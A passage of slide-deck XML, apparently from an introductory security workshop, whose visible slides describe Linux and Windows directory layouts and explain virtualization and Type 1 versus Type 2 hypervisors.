          <p:cNvPr id="473" name="Google Shape;473;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2990088"/>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/var/log</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="2990088"/>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Logs. First place a defender looks.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3312414"/>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/usr</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="3312414"/>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Installed programs and their files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3634740"/>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/bin, /sbin</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Google Shape;478;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="3634740"/>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Essential command binaries</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3957066"/>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/tmp</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="3957066"/>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Temporary files, cleared on reboot</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4279392"/>
            <a:ext cx="144018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800"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/root</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="4279392"/>
            <a:ext cx="209169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root user's home (not the same as /)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="1405890"/>
            <a:ext cx="3943350" cy="3360420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1633"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4" name="Google Shape;484;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="1577340"/>
            <a:ext cx="1097280" cy="308610"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 13333" name="adj"/>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5" name="Google Shape;485;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="1577340"/>
            <a:ext cx="1097280" cy="30861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Windows</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2023110"/>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C:\</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="2023110"/>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main drive letter. Other drives get their own letter.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2345436"/>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C:\Users\&lt;user&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Google Shape;489;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="2345436"/>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User files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2667762"/>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C:\Windows</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="2667762"/>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OS itself</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2990088"/>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System32</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="2990088"/>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Critical system binaries and DLLs</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3312414"/>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Program Files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="3312414"/>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Installed applications</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3634740"/>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ProgramData</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Google Shape;497;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="3634740"/>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Shared app data, not tied to one user</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3957066"/>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AppData\Roaming</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Google Shape;499;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="3957066"/>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Per-user application settings</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Google Shape;500;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="4279392"/>
            <a:ext cx="157734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800"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1C7268"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>C:\Windows\Temp</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="4279392"/>
            <a:ext cx="19545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Temporary files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p29"/>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File layouts</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Google Shape;503;p29"/>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08" name="Shape 508"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p30"/>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DEFINITION #4</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p30"/>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What is virtualization?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="4046220" cy="3360420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1633" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5F4F2"/>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2" name="Google Shape;512;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1611630"/>
            <a:ext cx="548640" cy="54864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13" name="Google Shape;513;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757124" y="1682954"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2263140"/>
            <a:ext cx="3634740" cy="12344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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A hypervisor carves your one physical computer's CPU, RAM, disk, and network into an isolated virtual machine (VM): a separate computer with its own hardware, running inside the host.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3703320"/>
            <a:ext cx="363474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A full, disposable computer that doesn't touch the host machine.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="1405890"/>
            <a:ext cx="3909060" cy="1611630"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3404"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17" name="Google Shape;517;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="1577340"/>
            <a:ext cx="34975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200"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Type 1 (bare metal)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="1920240"/>
            <a:ext cx="3497580" cy="102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The hypervisor runs directly on hardware. Used in servers and the AWS Range. Example: ESXi, Proxmox.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="3188970"/>
            <a:ext cx="3909060" cy="1611630"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3404"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0" name="Google Shape;520;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="3360420"/>
            <a:ext cx="34975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60000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Type 2 (hosted)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Google Shape;521;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="3703320"/>
            <a:ext cx="3497580" cy="1028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The hypervisor runs as an app on your normal OS. What we use tonight. Example: VirtualBox, VMware, UTM.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522;p30"/>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What is virtualization?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
